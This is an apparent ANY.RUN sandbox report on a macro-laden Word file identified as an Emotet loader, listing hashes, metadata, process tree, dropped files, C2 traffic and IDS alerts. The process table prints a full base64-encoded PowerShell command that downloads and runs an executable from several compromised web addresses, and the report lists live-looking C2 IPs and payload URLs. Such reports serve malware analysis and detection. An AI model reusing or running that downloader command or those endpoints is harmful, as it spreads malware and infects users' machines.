analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

098902731960907534.doc

Full analysis: https://app.any.run/tasks/450f7ea2-00e4-4cdc-9af1-0841ae8dd39b
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 14, 2019, 10:31:23
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
loader
emotet
trojan
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: proactive, Subject: Applications, Author: Aron Pfeffer, Keywords: bus, Comments: Underpass, Template: Normal.dotm, Last Saved By: Marlee Sanford, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 07:26:00 2019, Last Saved Time/Date: Mon Oct 14 07:26:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 176, Security: 0
MD5:

7A4C28887C3DA893B1EA92B63099998A

SHA1:

29A9BF1B97F9C6DB49C1DD4B5B3FF258D37D37E6

SHA256:

CD094FC2717295F64CBE858DCAF1BE806258D9AE24FC38B21BF51B656C8136F7

SSDEEP:

6144:CaxMYdtPWuM9bdFtr6/DVokOe89/uvbuoh:Ca7dtPWuMP6/KeyM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Emotet process was detected

      • 798.exe (PID: 940)
    • Application was dropped or rewritten from another process

      • msptermsizes.exe (PID: 1764)
      • 798.exe (PID: 940)
      • 798.exe (PID: 2800)
      • msptermsizes.exe (PID: 3048)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2864)
    • EMOTET was detected

      • msptermsizes.exe (PID: 3048)
    • Changes the autorun value in the registry

      • msptermsizes.exe (PID: 3048)
    • Connects to CnC server

      • msptermsizes.exe (PID: 3048)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2864)
    • Executed via WMI

      • powershell.exe (PID: 2864)
    • PowerShell script executed

      • powershell.exe (PID: 2864)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2864)
      • 798.exe (PID: 940)
    • Starts itself from another location

      • 798.exe (PID: 940)
    • Connects to server without host name

      • msptermsizes.exe (PID: 3048)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2148)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2148)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: proactive
Subject: Applications
Author: Aron Pfeffer
Keywords: bus
Comments: Underpass
Template: Normal.dotm
LastModifiedBy: Marlee Sanford
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:10:14 06:26:00
ModifyDate: 2019:10:14 06:26:00
Pages: 1
Words: 30
Characters: 176
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Turcotte LLC
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 205
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Kessler
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 798.exe no specs #EMOTET 798.exe msptermsizes.exe no specs #EMOTET msptermsizes.exe

Process information

PID
CMD
Path
Indicators
Parent process
2148"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\098902731960907534.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2864powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABhADIAZQBkADIAOQA1ADEANgA4ADIAMgBiAD0AJwBhADAAeAAzADYANwA2ADUAZQBjAGMAMgA4ACcAOwAkAGEAMAB4AGMAZABjADQAZgA0ADAAYQBhAGUAZQAxACAAPQAgACcANwA5ADgAJwA7ACQAYQAwAHgAYQBkADEANQA0ADkANwAyADMANwAwADAAYQA9ACcAYQAwAHgAMgBjADgAOQBmADYANwA2AGIAYQAzAGUANgBjACcAOwAkAGEAMAB4ADgANABhADMAMAA5AGIAMgA0ADYANABhADEAMQBhAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABhADAAeABjAGQAYwA0AGYANAAwAGEAYQBlAGUAMQArACcALgBlAHgAZQAnADsAJABhADAAeABmAGMAYgBjAGIAMQBkADcAZAAzADAAMwA9ACcAYQAwAHgANAA0ADYANwBmAGIANwAwADkAZgAyADYAJwA7ACQAYQAwAHgANgA3ADIAZABlAGUAZAAxAGEANwA3AGIAZgBmAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAagAnACsAJwBlAGMAdAAnACkAIABuAGUAVAAuAFcARQBCAGMAbABpAEUAbgB0ADsAJABhADAAeAAxAGEAZAA0AGIANQA2ADcAMwA4ADIAMAA0AD0AJwBoAHQAdABwADoALwAvAGMAbwBhAHMAdABhAGwAdABoAGUAcgBhAHAAeQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AYwBoAHoAMAB1ADkAMwA0ADcALwAqAGgAdAB0AHAAOgAvAC8AYgByAGEAbgBkAHMAbwBmAHoAYQBtAGIAaQBhAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwAwAHEAcwBzAGcAMwA4ADQAMQAvACoAaAB0AHQAcABzADoALwAvAGIAdQBzAGUAYQBjAHkAYwBsAGUALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBnAGsAMAA1ADYALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAG8AawBzAGwAaQBuAGsALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHAAawA5ADcAMAA5ADYALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGgAbwBsAGwAeQB3AG8AbwBkAGMAbAB1AGIALgB4AHkAegAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHUAYQA2ADcAdgAzADIAOAA4AC8AJwAuACIAUwBwAEwAYABJAFQAIgAoACcAKgAnACkAOwAkAGEAMAB4ADAAYgAwADYAZQA1ADEANABlAGEAOQAxAGYAMAA9ACcAYQAwAHgANgA0ADYANQA1AGYANwBlAGMAOQBhAGUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGEAMAB4ADIAYgA1ADQAOAAyAGYAYgBiAGEAIABpAG4AIAAkAGEAMAB4ADEAYQBkADQAYgA1ADYANwAzADgAMgAwADQAKQB7AHQAcgB5AHsAJABhADAAeAA2ADcAMgBkAGUAZQBkADEAYQA3ADcAYgBmAGYALgAiAEQAbwBgAHcAbgBgAEwAbwBgAEEAZABmAEkATABlACIAKAAkAGEAMAB4ADIAYgA1ADQAOAAyAGYAYgBiAGEALAAgACQAYQAwAHgAOAA0AGEAMwAwADkAYgAyADQANgA0AGEAMQAxAGEAKQA7ACQAYQAwAHgAOQA0AGIAMgA2ADIAMwBhADUAYQA0AD0AJwBhADAAeABlAGMANwA0AGQAOABlAGYAMAA0ADEAMwAxAGEANAAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0ASQB0AGUAbQAnACkAIAAkAGEAMAB4ADgANABhADMAMAA5AGIAMgA0ADYANABhADEAMQBhACkALgAiAEwAYABlAG4ARwBgAFQASAAiACAALQBnAGUAIAAzADMANwA5ADgAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAYQBSAHQAIgAoACQAYQAwAHgAOAA0AGEAMwAwADkAYgAyADQANgA0AGEAMQAxAGEAKQA7ACQAYQAwAHgAMQAxADEANAA2AGMAOQA5ADgAYgBlAGMAMQA9ACcAYQAwAHgAYgBmAGQAYwAzADkANQAzAGEANABhAGQANQBlADEAJwA7AGIAcgBlAGEAawA7ACQAYQAwAHgAZgAxAGYAMwBhADkAOABmAGQAYgA1AGQAPQAnAGEAMAB4AGYANwA3ADEAYwA3ADcAOABiAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYQAwAHgAYgBlADQAYQA2AGMAZQBkADAANgA2ADEANgA9ACcAYQAwAHgANgBlAGYANgBhADAAYgBlAGUANwBmACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2800"C:\Users\admin\798.exe" C:\Users\admin\798.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
940--6b88d874C:\Users\admin\798.exe
798.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1764"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe798.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3048--f91b2738C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
msptermsizes.exe
User:
admin
Integrity Level:
MEDIUM
Total events
2 259
Read events
1 432
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
2148WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA7E3.tmp.cvr
MD5:
SHA256:
2864powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KYAM4R63VZ982I9BYZI3.temp
MD5:
SHA256:
2148WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5036D0B0.wmfwmf
MD5:5F7A481488EBE140A33FFDA498C690E2
SHA256:4913062932E1510C594F3B2A5D9476202CD4EF3002C98470A3EA74AFEE28B99E
2148WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F25D0FC.wmfwmf
MD5:78FFBCD93621752F2FE5F19B86C710FE
SHA256:6934219ECC272C8BD59CD8FBF4CEA1E6CD4C82A77DC1BE531C65C38C080E6C5B
2148WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:CDE10443611CC4BFC209EA5FE4CF60BA
SHA256:EEBD2280F88FBED4CDBCEFBB91975506A5752904591111C53E0B6123102C3C82
2148WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BD901927.wmfwmf
MD5:5EFBD00E0B3BE224567496BCA0CBDED0
SHA256:F8176CA69EFC866EE151717A84A35D8EC2B2C73733FE2120A9C6AD60C42AA25C
2148WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1DC86A3E.wmfwmf
MD5:69CAD5450BD68EDFA238584B421A72C3
SHA256:DDB4D3ECABFD90E64EA0281B30BB9F1D29EB8777464093BE1684DF84018FBC62
2148WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4B1EB8F1.wmfwmf
MD5:F5EC9F30617A6F4BE91718F3DEAF8F3F
SHA256:CD62F1FBFAB890C51562A74453DB5D5C0E3AD4DCC8DD0D19A788CBF16D83113E
2148WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6E5A3D63.wmfwmf
MD5:2AB9CEFBC845519D97348E6D2AE5E817
SHA256:DC9CAAF84273277B5E93682D4FCBE0627CD5791771F752A3740FDA1C9B7376FD
2864powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
6
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3048
msptermsizes.exe
POST
216.98.148.181:8080
http://216.98.148.181:8080/stubs/prov/add/
US
malicious
3048
msptermsizes.exe
POST
191.82.16.60:80
http://191.82.16.60/window/usbccid/add/
AR
malicious
3048
msptermsizes.exe
POST
91.83.93.105:8080
http://91.83.93.105:8080/taskbar/xian/add/
HU
malicious
3048
msptermsizes.exe
POST
404
110.36.234.146:80
http://110.36.234.146/cookies/
PK
html
570 b
malicious
2864
powershell.exe
GET
200
50.28.1.57:80
http://coastaltherapy.com/wp-includes/chz0u9347/
US
executable
236 Kb
suspicious
3048
msptermsizes.exe
POST
200
68.183.190.199:8080
http://68.183.190.199:8080/enabled/splash/add/
US
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3048
msptermsizes.exe
91.83.93.105:8080
Invitech Megoldasok Zrt.
HU
malicious
3048
msptermsizes.exe
191.82.16.60:80
Telefonica de Argentina
AR
malicious
3048
msptermsizes.exe
110.36.234.146:80
National WiMAX/IMS environment
PK
malicious
3048
msptermsizes.exe
216.98.148.181:8080
CariNet, Inc.
US
malicious
2864
powershell.exe
50.28.1.57:80
coastaltherapy.com
Liquid Web, L.L.C
US
suspicious
3048
msptermsizes.exe
68.183.190.199:8080
DSL Extreme
US
malicious

DNS requests

Domain
IP
Reputation
coastaltherapy.com
  • 50.28.1.57
suspicious

Threats

PID
Process
Class
Message
2864
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2864
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2864
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3048
msptermsizes.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 2
3048
msptermsizes.exe
A Network Trojan was detected
AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
3048
msptermsizes.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3048
msptermsizes.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3048
msptermsizes.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 23
3048
msptermsizes.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3048
msptermsizes.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 16
14 ETPRO signatures available at the full report
No debug info